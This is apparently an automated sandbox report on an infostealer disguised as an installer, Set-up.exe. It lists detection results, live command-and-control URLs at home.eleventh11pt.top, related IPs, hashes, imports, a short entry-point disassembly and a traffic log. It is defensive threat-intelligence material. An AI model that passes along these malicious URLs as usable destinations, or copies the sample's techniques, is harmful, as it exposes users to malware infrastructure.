SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync17
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Set-up.exe29%ReversingLabsWin32.Infostealer.Tinba
Set-up.exe32%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://httpbin.org/ip90%Avira URL Cloudsafe
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836100%Avira URL Cloudmalware
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFn100%Avira URL Cloudmalware
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1100%Avira URL Cloudmalware
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
home.eleventh11pt.top
193.233.84.212
truetrue
    unknown
    httpbin.org
    52.73.63.247
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836true
      • Avira URL Cloud: malware
      unknown
      http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0true
      • Avira URL Cloud: malware
      unknown
      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlSet-up.exefalse
          high
          http://html4/loose.dtdSet-up.exefalse
            high
            https://httpbin.org/ipbeforeSet-up.exefalse
              high
              https://httpbin.org/ip9Set-up.exe, 00000000.00000003.1692006117.0000000000C83000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://curl.se/docs/http-cookies.htmlSet-up.exefalse
                high
                https://curl.se/docs/hsts.html#Set-up.exefalse
                  high
                  https://curl.se/docs/alt-svc.htmlSet-up.exefalse
                    high
                    http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFnSet-up.exe, 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://.cssSet-up.exefalse
                      high
                      http://.jpgSet-up.exefalse
                        high
                        http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1Set-up.exe, 00000000.00000003.1811748473.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1813418338.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        193.233.84.212
                        home.eleventh11pt.topRussian Federation
                        20549FREE-MPEIRUtrue
                        52.73.63.247
                        httpbin.orgUnited States
                        14618AMAZON-AESUSfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582042
                        Start date and time:2024-12-29 16:50:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Set-up.exe
                        Detection:MAL
                        Classification:mal76.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 86%
                        • Number of executed functions: 49
                        • Number of non-executed functions: 157
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        No simulations
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        httpbin.orga2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                        • 34.226.108.155
                        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                        • 3.218.7.103
                        FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                        • 34.226.108.155
                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                        • 34.226.108.155
                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                        • 3.218.7.103
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FREE-MPEIRUXODc5nV1kC.exeGet hashmaliciousLummaCBrowse
                        • 193.233.112.194
                        BnxBRWQWhy.exeGet hashmaliciousStealc, VidarBrowse
                        • 193.233.112.44
                        NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                        • 193.233.112.44
                        file.exeGet hashmaliciousStealcBrowse
                        • 193.233.113.184
                        file.exeGet hashmaliciousStealcBrowse
                        • 193.233.113.184
                        file.exeGet hashmaliciousStealcBrowse
                        • 193.233.113.184
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 193.233.113.184
                        SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                        • 193.233.121.52
                        file.exeGet hashmaliciousDCRatBrowse
                        • 193.233.115.185
                        BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                        • 193.233.122.71
                        AMAZON-AESUST1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                        • 34.198.65.183
                        https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                        • 54.209.230.227
                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                        • 44.198.90.23
                        db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                        • 44.221.106.81
                        ArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                        • 44.221.84.105
                        aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                        • 44.221.84.105
                        yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                        • 44.221.84.105
                        gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                        • 44.221.84.105
                        a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                        • 3.218.7.103
                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                        • 34.226.108.155
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Entropy (8bit):6.2231848331240665
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.53%
                        • InstallShield setup (43055/19) 0.43%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Set-up.exe
                        File size:7'363'720 bytes
                        MD5:fb412d366acb254b7870e17ea228e971
                        SHA1:6217577b0421b22d98717a23b46b884481d298e7
                        SHA256:db605eba071eeeb78c1aa93a018046699cca2a5260e9601f599cd96c55cccd9d
                        SHA512:6e6c92c8dd38b77404ac871aa3cf7be0abca27d657d447312ea366b25af0dbd6f984931b0c5c990d04a9ffd130ae177448e847639c9f1901c415dbda5ced2968
                        SSDEEP:98304:iBQu+9ZWL3Mc6js4ReDetZ5n22YtvKqbyz8Q4:qsZySg0FnBovjbG8Q4
                        TLSH:CF763961EE8791F5C6C30571511AB3BF6E30AF009929CEB6CE80FB74C672B11E95E618
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg...............(..M..Rp..2............M...@...........................p.......p...@... ............................
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0x4014a0
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x67711CFF [Sun Dec 29 09:57:19 2024 UTC]
                        TLS Callbacks:0x7890e0, 0x789090
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:51b39aff649af7abc30a06f2362db069
                        Signature Valid:false
                        Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                        Signature Validation Error:A certificate chain could not be built to a trusted root authority
                        Error Number:-2146762486
                        Not Before, Not After
                        • 26/08/2024 17:01:06 21/08/2025 17:01:06
                        Subject Chain
                        • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                        Version:3
                        Thumbprint MD5:E13F8785CE1066C4F3A882B77A151115
                        Thumbprint SHA-1:F14A35BB462FE8292593C2ED5EA7AC719FCFD2F4
                        Thumbprint SHA-256:3EC1B9E679141990B69476A586D7288E93F224B3AB9244DAA22B36FDBA2C4232
                        Serial:33009F7B734DB0480411EB0BBA0000009F7B73
                        Instruction
                        mov dword ptr [00AD2658h], 00000001h
                        jmp 00007F8DF4DD42B6h
                        nop
                        mov dword ptr [00AD2658h], 00000000h
                        jmp 00007F8DF4DD42A6h
                        nop
                        sub esp, 1Ch
                        mov eax, dword ptr [esp+20h]
                        mov dword ptr [esp], eax
                        call 00007F8DF515BB16h
                        cmp eax, 01h
                        sbb eax, eax
                        add esp, 1Ch
                        ret
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        push ebp
                        mov ebp, esp
                        push edi
                        push esi
                        push ebx
                        sub esp, 1Ch
                        mov dword ptr [esp], 00979000h
                        call dword ptr [00AD49A8h]
                        sub esp, 04h
                        test eax, eax
                        je 00007F8DF4DD4675h
                        mov ebx, eax
                        mov dword ptr [esp], 00979000h
                        call dword ptr [00AD4A1Ch]
                        mov edi, dword ptr [00AD49BCh]
                        sub esp, 04h
                        mov dword ptr [00AD0028h], eax
                        mov dword ptr [esp+04h], 00979013h
                        mov dword ptr [esp], ebx
                        call edi
                        sub esp, 08h
                        mov esi, eax
                        mov dword ptr [esp+04h], 00979029h
                        mov dword ptr [esp], ebx
                        call edi
                        sub esp, 08h
                        mov dword ptr [008DF004h], eax
                        test esi, esi
                        je 00007F8DF4DD4613h
                        mov dword ptr [esp+04h], 00AD002Ch
                        mov dword ptr [esp], 00ACB104h
                        call esi
                        mov dword ptr [esp], 00401580h
                        call 00007F8DF4DD4563h
                        lea esp, dword ptr [ebp-0Ch]
                        pop ebx
                        pop esi
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6d40000x2dac.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x7056000x688.reloc
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6d90000x348fc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x6c10400x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x6d48140x620.idata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x4dd0cc0x4dd20078b2ca06181f3b3236d06feddb3601e8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .data0x4df0000x995440x99600db69b9c379e8d3dbc75a0ed7117fbc10False0.03848945599022005dBase III DBT, version number 0, next free block index 10, 1st item "2J{"0.5385844035293097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rdata0x5790000x151e780x152000f7c0eb81653796768b80228933ba159dFalse0.4208153719027367data6.274600384389603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .eh_fram0x6cb0000x4d640x4e00004401d83ac413e752439210b631a229False0.31946113782051283data4.912960490847057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .bss0x6d00000x31800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata0x6d40000x2dac0x2e00b043cc9091bb6c51cad3779275ed92c8False0.367866847826087data5.3439160182225125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .CRT0x6d70000x300x200fe2a65d4187b984679c52ae93485940eFalse0.0625data0.2233456448570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .tls0x6d80000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .reloc0x6d90000x348fc0x34a00b179056644a8312dd5192e6bdb59ec74False0.4987102880047506data6.6555485608080565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DLLImport
                        ADVAPI32.dllCryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
                        bcrypt.dllBCryptGenRandom
                        CRYPT32.dllCertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
                        GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
                        gdiplus.dllGdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
                        IPHLPAPI.DLLConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
                        KERNEL32.dllAcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
                        msvcrt.dll__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
                        ole32.dllCreateStreamOnHGlobal
                        SHELL32.dllSHGetKnownFolderPath
                        api-ms-win-crt-convert-l1-1-0.dllatoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
                        api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
                        api-ms-win-crt-filesystem-l1-1-0.dll_fstat64, _stat64, _unlink
                        api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                        api-ms-win-crt-locale-l1-1-0.dllsetlocale
                        api-ms-win-crt-math-l1-1-0.dll_fdopen
                        api-ms-win-crt-private-l1-1-0.dllmemchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
                        api-ms-win-crt-runtime-l1-1-0.dll_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
                        api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
                        api-ms-win-crt-string-l1-1-0.dll_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
                        api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
                        api-ms-win-crt-utility-l1-1-0.dll_byteswap_uint64, bsearch, qsort, rand, srand
                        USER32.dllCharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
                        WS2_32.dllWSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 29, 2024 16:50:58.950694084 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:50:58.950730085 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:50:58.950879097 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:50:58.953516006 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:50:58.953530073 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.193193913 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.195139885 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.195152998 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.196304083 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.196374893 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.209722042 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.209785938 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.222398043 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.222404957 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.268181086 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.553297997 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.553349972 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:01.553518057 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.554531097 CET49730443192.168.2.452.73.63.247
                        Dec 29, 2024 16:51:01.554543018 CET4434973052.73.63.247192.168.2.4
                        Dec 29, 2024 16:51:02.889378071 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.010226965 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.010324001 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.011533022 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.132704973 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.132750988 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.132855892 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.132865906 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.132874012 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.132889032 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.132901907 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.132998943 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.133008003 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.133064985 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.133080959 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.133089066 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.133137941 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.133156061 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.133199930 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.253483057 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253561974 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.253686905 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253746986 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.253788948 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253798008 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253801107 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253851891 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253856897 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.253859997 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.253905058 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.296088934 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.296257973 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.416115999 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.416187048 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.460031033 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.580043077 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.580105066 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:03.783998966 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:03.784069061 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.036003113 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.036237001 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.139646053 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.139954090 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.140012026 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.157116890 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.157171965 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.260879993 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.260931969 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.260967970 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.260986090 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261002064 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261009932 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261040926 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261101961 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261173964 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261183023 CET8049731193.233.84.212192.168.2.4
